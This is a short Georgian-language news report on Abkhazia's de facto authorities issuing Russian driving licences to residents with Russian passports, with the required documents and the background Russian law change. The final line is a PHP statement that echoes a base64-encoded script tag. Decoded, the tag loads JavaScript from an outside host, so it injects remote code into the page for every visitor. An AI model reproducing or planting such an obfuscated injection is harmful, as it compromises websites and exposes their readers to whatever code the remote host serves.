gorgia
ავერსი jaluzi

აფხაზეთში მცხოვრებლებისთვის, რომლებსაც რუსეთის პასპორტი აქვთ, რუსული მართვის მოწმობების გაცემა გამარტივებული პროცედურის შესაბამისად დაიწყო.

ინფორმაციას დე ფაქტო შინაგან საქმეთა სამინისტრო ავრცელებს.

უწყების ცნობით, პროცესი პუტინისა და აფხაზეთის დე ფაქტო პრეზიდენტის დავალებით არის ორგანიზებული და მოწმობები სოხუმში, აფხაზეთის საგზაო უსაფრთხოების დე ფაქტო სახელმწიფო ინსპექციის განყოფილებაში, სამშაბათიდან შაბათის ჩათვლით გაიცემა.

რუსული მართვის მოწმობის მისაღებად ადგილობრივებმა რუსეთის ფედერაციისა და ე.წ. აფხაზეთის მოქმედი პასპორტები, ასევე, ვადაგასული ე.წ. აფხაზური მართვის მოწმობა უნდა წარადგინონ.

ცნობისთვის: მარტის დასაწყისში მოსკოვში, პუტინთან შეხვედრის დროს ახალმა დე ფაქტო პრეზიდენტ ბადრა გუნბამ აფხაზეთში რუსული მართვის მოწმობის არმქონე პირებისთვის რუსეთში შესვლის აკრძალვის გადავადება ითხოვა. 2024 წელს რუსეთის კანონმდებლობაში შევიდა ცვლილებები, რომლის თანახმად, მიმდინარე წლის 1-ლი აპრილიდან ქვეყანაში იმ პირთა უცხოური მართვის მოწმობები უქმდება, რომლებმაც რუსეთის მოქალაქეობა ან ბინადრობის ნებართვა ერთ წელზე მეტი ხნის წინ მიიღეს.

 

112
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");